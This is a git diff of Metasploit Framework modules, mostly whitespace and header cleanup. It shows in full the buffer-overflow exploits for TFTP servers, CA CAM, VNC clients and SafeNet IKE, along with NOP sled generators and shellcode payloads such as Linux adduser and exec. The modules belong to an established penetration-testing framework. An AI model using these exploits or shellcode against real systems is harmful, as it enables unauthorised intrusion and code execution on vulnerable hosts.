part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TFTPD32 <= 2.21 Long Filename Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in TFTPD32 version 2.21 + This module exploits a stack overflow in TFTPD32 version 2.21 and prior. By sending a request for an overly long file name to the tftpd32 server, a remote attacker could overflow a buffer and execute arbitrary code on the system. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2002-2226'], + 'References' => + [ + ['CVE', '2002-2226'], ['OSVDB', '45903'], ['BID', '6199'], ], @@ -46,26 +44,21 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ ['Windows NT 4.0 SP6a English', { 'Ret' => 0x77f9d463} ], - ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663} ], - ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0} ], - ['Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527} ], + ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663} ], + ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0} ], + ['Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527} ], ], - 'Privileged' => true, - 'DisclosureDate' => 'Nov 19 2002' - )) - register_options( - [ - Opt::RPORT(69) - ], self) - + register_options( + [ + Opt::RPORT(69) + ], self) end def exploit @@ -73,18 +66,18 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - sploit = - "\x00\x01" + - rand_text_english(120, payload_badchars) + + sploit = + "\x00\x01" + + rand_text_english(120, payload_badchars) + "." + - rand_text_english(135, payload_badchars) + + rand_text_english(135, payload_badchars) + [target.ret].pack('V') + - payload.encoded + + payload.encoded + "\x00" - + udp_sock.put(sploit) - - disconnect_udp + + disconnect_udp end end diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 5f25f1e3bb..5a3ffb6a00 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -22,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow', 'Description' => %q{ - This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending + This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten. }, 'Author' => [ 'patrick' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-4948' ], [ 'OSVDB', '29032' ], [ 'BID', '20131' ], @@ -47,17 +45,17 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Patrick - Tested OK 2007/10/02 w2ksp0, w2ksp4, xpsp0, xpsp2 en + # Patrick - Tested OK 2007/10/02 w2ksp0, w2ksp4, xpsp0, xpsp2 en [ 'Universal - tftpd.exe', { 'Ret' => 0x00458b91 } ] # pop edx / ret tftpd.exe ], 'Privileged' => false, 'DisclosureDate' => 'Sep 21 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(69), - ], self) + register_options( + [ + Opt::RPORT(69), + ], self) end def exploit @@ -67,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "\x00\x02" + payload.encoded + [target['Ret']].pack('V') sploit << "netascii\x00" # The first null byte is borrowed for the target return address :) udp_sock.put(sploit) - + disconnect_udp end diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index b40e011e01..4f0f32c785 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -22,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => '3CTftpSvc TFTP Long Mode Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in 3CTftpSvc 2.0.1. By + This module exploits a stack overflow in 3CTftpSvc 2.0.1. By sending a specially crafted packet with an overly long mode field, a remote attacker could overflow a buffer and execute arbitrary code on the system. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-6183'], ['OSVDB', '30758'], ['BID', '21301'], @@ -55,21 +53,20 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 27 2006')) - register_options([Opt::RPORT(69)], self.class) - + register_options([Opt::RPORT(69)], self.class) end def exploit connect_udp sploit = "\x00\x02" + rand_text_alpha_upper(1) + "\x00" + make_nops(73) - sploit << payload.encoded + [target.ret].pack('V') + make_nops(25) + "\x00" + sploit << payload.encoded + [target.ret].pack('V') + make_nops(25) + "\x00" print_status("Trying target #{target.name}...") - + udp_sock.put(sploit) - - disconnect_udp + + disconnect_udp end end diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 322f05c622..e5075121dd 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -3,30 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'CA CAM log_security() Stack Overflow (Win32)', 'Description' => %q{ - This module exploits a vulnerability in the CA CAM service + This module exploits a vulnerability in the CA CAM service by passing a long parameter to the log_security() function. The CAM service is part of TNG Unicenter. This module has been tested on Unicenter v3.1. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -43,9 +40,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1024, 'BadChars' => "\x00", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ # W2API.DLL @ 0x01950000 - return to ESI ['W2API.DLL TNG 2.3', { 'Platform' => 'win', 'Ret' => 0x01951107 }], @@ -65,26 +61,26 @@ class Metasploit3 < Msf::Exploit::Remote connect ack = sock.get_once disconnect - - (ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe + + (ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe end - + def exploit connect - + ack = sock.get_once if (ack != "ACK\x00") print_status("The CAM service is not responding") end - + buf = rand_text_english(4096, payload_badchars) - + # Offset 1016 for EIP, 1024 = ESP, 1052 = ESI buf[ 1016, 4 ] = [target.ret].pack('V') - buf[ 1052, payload.encoded.length ] = payload.encoded + buf[ 1052, payload.encoded.length ] = payload.encoded sock.put("\xfa\xf9\x00\x10" + buf + "\x00") - + handler disconnect end diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index 6208cb2dd5..a4865ecbfe 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -25,8 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2001-0167' ], [ 'OSVDB', '6281' ], [ 'BID', '2305' ], @@ -54,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) ], self.class) end diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index f340bdb3eb..a63cbe1745 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -26,8 +24,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-1652' ], [ 'OSVDB', '24456' ], [ 'BID', '17378' ], @@ -55,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) ], self.class) end diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 5d918a2484..44c9e1fd64 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SafeNet SoftRemote IKE Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Safenet SoftRemote IKE IreIKE.exe + This module exploits a stack overflow in Safenet SoftRemote IKE IreIKE.exe service. When sending a specially crafted udp packet to port 62514 an attacker may be able to execute arbitrary code. This module has been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using - windows/meterpreter/reverse_ord_tcp payloads. + windows/meterpreter/reverse_ord_tcp payloads. }, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2009-1943' ], [ 'OSVDB', '54831' ], [ 'BID', '35154' ], @@ -53,14 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jun 1 2009', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(62514)], self) - + register_options([Opt::RPORT(62514)], self) end def exploit connect_udp - + sploit = [0x01000000].pack('V') # IPC packet sploit << [0x00000033].pack('V') # Exploit this thing using command 0x11 (0x33 - 0x28). sploit << payload.encoded @@ -71,9 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote udp_sock.put(sploit) sleep(5) - handler + handler disconnect_udp - + end end diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index 3cf163a7df..996d8d8026 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -42,11 +42,11 @@ class Metasploit3 < Msf::Nop def generate_sled(length, opts) - + badchars = opts['BadChars'] || '' random = opts['Random'] || datastore['RandomNops'] - nops = [ + nops = [ 0xe1a01001, 0xe1a02002, 0xe1a03003, @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Nop 0xe1a0a00a, 0xe1a0b00b ] - + if( random and random.match(/^(t|y|1)/i) ) return ([nops[rand(nops.length)]].pack("V*") * (length/4)) end diff --git a/modules/nops/nop_test.rb.ut.rb b/modules/nops/nop_test.rb.ut.rb index fbbcf05468..3dd48800d5 100644 --- a/modules/nops/nop_test.rb.ut.rb +++ b/modules/nops/nop_test.rb.ut.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index e6574d7fda..c8d62e0324 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -37,4 +37,4 @@ class Metasploit3 < Msf::Nop " " * length end -end \ No newline at end of file +end diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 0f63e94ac0..6015022c60 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -42,30 +42,30 @@ class Metasploit3 < Msf::Nop def generate_sled(length, opts) - + badchars = opts['BadChars'] || '' random = opts['Random'] || datastore['RandomNops'] - + if( random and random.match(/^(t|y|1)/i) ) 1.upto(1024) do |i| regs_d = (rand(0x8000 - 0x0800) + 0x0800).to_i regs_b = [regs_d].pack('n').unpack('B*')[0][1, 15] flag_o = rand(2).to_i flag_r = rand(2).to_i - + pcword = ["011111#{regs_b}#{flag_o}100001010#{flag_r}"].pack("B*") failed = false - + pcword.each_byte do |c| failed = true if badchars.include?(c.chr) end - + next if failed - + return (pcword * (length / 4))[0, length] end end - + return ("\x60" * length)[0, length] end diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 44dc3629dd..023c7f6680 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,14 +22,14 @@ require 'msf/core' # ### class Metasploit3 < Msf::Nop - + # Nop types InsSethi = 0 InsArithmetic = 1 InsBranch = 2 - + # Generator table - SPARC_Table = [ + SPARC_Table = [ [ InsSethi, [ ], ], # sethi [ InsArithmetic, [ 0, 0 ], ], # add [ InsArithmetic, [ 0, 1 ], ], # and @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Nop [ InsBranch, [ 14 ] ], # bpos[,a] [ InsBranch, [ 15 ] ], # bvc[,a] ] - + def initialize super( 'Name' => 'SPARC NOP generator', @@ -97,17 +97,17 @@ class Metasploit3 < Msf::Nop # Nops are always random... def generate_sled(length, opts) - + badchars = opts['BadChars'] || '' random = opts['Random'] || datastore['RandomNops'] blen = length - + buff = '' count = 0 while (buff.length < blen) r = SPARC_Table[ rand(SPARC_Table.length) ] t = '' - + case r[0] when InsSethi t = ins_sethi(r[1], blen - buff.length) @@ -119,18 +119,18 @@ class Metasploit3 < Msf::Nop print_status("Invalid opcode type") raise RuntimeError end - + failed = false - + t.each_byte do |c| failed = true if badchars.include?(c.chr) end - + if (not failed) buff << t count = -100 end - + if (count > length + 1000) if(buff.length != 0) return buff.slice(0, 4) * (blen / 4) @@ -138,10 +138,10 @@ class Metasploit3 < Msf::Nop print_status("The SPARC nop generator could not create a usable sled") raise RuntimeError end - + count += 1 end - + return buff end @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Nop def ins_sethi(ref, len=0) [(get_dst_reg() << 25) | (4 << 22) | rand(1 << 22)].pack('N') end - + def ins_arithmetic(ref, len=0) dst = get_dst_reg() ver = ref[0] @@ -174,45 +174,45 @@ class Metasploit3 < Msf::Nop # Use one src reg with a signed 13-bit immediate (non-0) if((ver == 0 && rand(2)) || ver == 1) return [ - (2 << 30) | - (dst << 25) | - (ref[1] << 19) | - (get_src_reg() << 14) | - (1 << 13) | + (2 << 30) | + (dst << 25) | + (ref[1] << 19) | + (get_src_reg() << 14) | + (1 << 13) | (rand((1 << 13) - 1) + 1) ].pack('N') end # ref[1] could be replaced with a static value since this only encodes for one function but it's done this way for - # conistancy/clarity. + # conistancy/clarity. if (ver == 4) return [(2 << 30) | (dst << 25) | (ref[1] << 19)].pack('N') end - + # Use two src regs return [ - (2 << 30) | - (dst << 25) | - (ref[1] << 19) | - (get_src_reg() << 14) | + (2 << 30) | + (dst << 25) | + (ref[1] << 19) | + (get_src_reg() << 14) | get_src_reg() ].pack('N') end - + def ins_branch(ref, len) # We jump to 1 instruction before the payload so in cases where the delay slot is another branch instruction that is # not taken with the anull bit set the first bit of the payload is not anulled. len = (len / 4) - 1 - + return '' if len == 0 len = 0x3fffff if (len >= 0x400000) - + return [ - (rand(2) << 29) | - (ref[0] << 25) | - (2 << 22) | + (rand(2) << 29) | + (ref[0] << 25) | + (2 << 22) | rand(len - 1) + 1 - ].pack('N') + ].pack('N') end - -end \ No newline at end of file + +end diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 7da6c86884..d2f233bf20 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 8a7219dd80..45fb2a653f 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -117,11 +117,11 @@ class Metasploit3 < Msf::Nop [ "\x49\xBE", 8, "mov r14, 0x????????????????" ], [ "\x49\xBF", 8, "mov r15, 0x????????????????" ], ] - + I_OP = 0 I_SIZE = 1 I_TEXT = 2 - + REGISTERS = [ [ "rsp", "esp", "sp" ], [ "rbp", "ebp", "bp" ], [ "rax", "eax", "ax", "al", "ah" ], @@ -146,11 +146,11 @@ class Metasploit3 < Msf::Nop sled = '' try_count = 0 good_bytes = [] - + # Fixup SaveRegisters so for example, if we wish to preserve RSP we also should also preserve ESP and SP REGISTERS.each { | reg | reg.each { |x| badregs += reg if badregs.include?( x ) } } badregs = badregs.uniq() - + # If we are preserving RSP we should avoid all PUSH/POP instructions... if badregs.include?( "rsp" ) badregs.push( 'push' ) @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Nop while true # Pick a random instruction and see if we can use it... instruction = instructions[ rand(instructions.length) ] - + # Avoid using any bad mnemonics/registers... try_another = false badregs.each do | bad | @@ -169,19 +169,19 @@ class Metasploit3 < Msf::Nop break if try_another end next if try_another - + # Get the first bytes of the chosed instructions opcodes... opcodes = instruction[I_OP] - + # If their are additional bytes to append, do it now... 1.upto( instruction[I_SIZE] ) do | i | opcodes += Rex::Text.rand_char( badchars ) end - + # If we have gone over the requested sled length, try again. if total_size + opcodes.length > length try_count -= 1 - + # If we have tried unsuccessfully 32 times we start unwinding the chosen opcode_stack to speed things up if try_count == 0 pop_count = 4 @@ -192,25 +192,25 @@ class Metasploit3 < Msf::Nop end next end - + # Reset the try_count for the next itteration. try_count = 32 - + # save the opcodes we just generated. opcodes_stack.push( opcodes ) - + # Increment the total size appropriately. total_size += opcodes.length - + # Once we have generated the requested amount of bytes we can finish. break if total_size == length end - + # Now that we have chosen all the instructions to use we must generate the actual sled. opcodes_stack.each do | opcodes_ | sled += opcodes_ end - + return sled end @@ -220,7 +220,7 @@ class Metasploit3 < Msf::Nop badregs = opts['SaveRegisters'] || [] good_instructions = [] sled = '' - + # Weed out any instructions which will contain a bad char/instruction... INSTRUCTIONS.each do | instruction | good = true; @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Nop end # if we are only to generate single byte instructions, weed out the multi byte ones... good = false if instruction[I_SIZE] > 0 and not datastore['MultiByte'] - + good_instructions.push( instruction ) if good end @@ -250,7 +250,7 @@ class Metasploit3 < Msf::Nop else sled += generate_random_sled( length, good_instructions, badchars, badregs ) end - + return sled end diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index c1d30369a0..22e5fbc85b 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index b18f79ea93..3b42a5ba50 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,7 +21,7 @@ require 'msf/core' ### class Metasploit3 < Msf::Nop -SINGLE_BYTE_SLED = +SINGLE_BYTE_SLED = { # opcode affected registers # ------ ------------------ @@ -152,4 +152,4 @@ SINGLE_BYTE_SLED = return out_sled end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index 0830964b72..50da315b5e 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -56,4 +56,4 @@ module Metasploit3 "\x57\x53\x89\xe1\x52\x51\x53\x50\xcd\x80" end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 900f69e2ce..3663c4489a 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 49a3db3e73..91da79dc53 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,9 +27,9 @@ module Metasploit3 'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ], 'License' => MSF_LICENSE, 'Arch' => ARCH_X86, - 'Payload' => + 'Payload' => { - 'Payload' => + 'Payload' => "\xcc" } )) diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index 88b69fd6c7..01d1cef79a 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 09049a908a..fdc2562cb2 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -25,7 +25,7 @@ module Metasploit3 include Msf::Payload::Single include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Add User', @@ -58,7 +58,7 @@ module Metasploit3 "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58" + "\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70" + "\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd" + - "\x80\x93" + Rex::Arch::X86.call(str.length) + str + + "\x80\x93" + Rex::Arch::X86.call(str.length) + str + "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58" + "\xcd\x80" end diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 2671e51819..248496e351 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -25,7 +25,7 @@ module Metasploit3 include Msf::Payload::Single include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', @@ -55,4 +55,4 @@ module Metasploit3 "\x57\x53\x89\xe1\xcd\x80" end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index 6042137b76..ec3d6ee6e2 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +23,7 @@ module Metasploit3 'Name' => 'OSX iPhone Vibrate', 'Version' => '$Revision$', 'Description' => %q| - Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. + Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>. |, 'Author' => 'hdm', @@ -41,4 +41,4 @@ module Metasploit3 ].pack("V*") end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 1f6358ce41..e5ff217d38 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -48,11 +48,11 @@ module Metasploit3 def generate cmd = datastore['CMD'] || '' payload = - "\x31\xc0\x50"+ + "\x31\xc0\x50"+ Rex::Arch::X86.call(cmd.length + 1) + cmd + "\x00\x5e\x89\xe7\xb9\x1e\x00" + "\x00\x00\xfc\xf2\xa4\x89\xe3\x50" + "\x50\x53\xb0\x3b\x50\xcd\x80" end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index 957f389f2c..4d292f8f37 100644 --- a/modules/payloads/singles/php/download_exec.rb +++ b/modules/payloads/singles/php/download_exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,7 +15,7 @@ require 'msf/core/payload/php' module Metasploit3 - + include Msf::Payload::Php include Msf::Payload::Single @@ -30,7 +30,7 @@ module Metasploit3 'Arch' => ARCH_PHP, 'Privileged' => false )) - + # EXITFUNC is not supported :/ deregister_options('EXITFUNC') diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 78c5461db3..665a43e048 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb 